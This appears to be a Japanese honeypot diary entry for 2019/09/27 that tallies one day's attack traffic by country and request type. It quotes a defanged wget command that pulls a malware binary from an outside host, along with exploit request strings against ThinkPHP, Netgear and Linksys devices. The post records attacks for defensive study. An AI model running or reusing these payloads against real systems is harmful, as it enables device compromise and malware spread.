23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(195日目)

2019/09/27(金)

トータルは4129件でした。

ハンティングログは以下です。

185.199.26[.]162 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl

www.virustotal.com

IPのロケーション別の件数は以下です。

ブラジル 4010
香港 34
中国 27
アメリ 13
ルーマニア 8
トルコ 4
イラン 4
シンガポール 4
エストニア 3
イタリア 3
韓国 2
ロシア 2
タイ 2
ウクライナ 1
アゼルバイジャン 1
フランス 1
ベトナム 1
チェコ 1
アルゼンチン 1
スイス 1
メキシコ 1
カナダ 1
チリ 1
インド 1
インドネシア 1
バングラデシュ 1

f:id:sec23:20190929002030p:plain

件数 概要 リクエス
4002 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
87 アクセス GET /
5 調査 HEAD /
5 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
5 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
5 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 DGN1000 Netgear ルータを狙うMirai亜種の攻撃 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1
2 JBOSS管理コンソールの調査 GET /admin-console/login.seam
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 vmwareのバージョン調査 POST /sdk
1 クローリング HEAD /robots.txt
1 不正中継の調査 GET hxxp[:]//www.baidu.com/
1 調査 GET HTTP/1.1
1 Zabbixの調査 GET /zabbix/jsrpc.php
1 WordPressの調査 GET /wp-login.php
1 NMAPによるスキャン GET /nmaplowercheck1569521511
1 NMAPによるスキャン GET /NmapUpperCheck1569521511
1 NMAPによるスキャン GET /Nmap/folder/check1569521511
1 phpMyASdminの調査 GET /index.php
1 WordPressのユーザー情報の調査 GET ///wp-json/wp/v2/users/
1 WordPressの調査 GET ///?author=1
1 不正中継の試み CONNECT baidu.com:80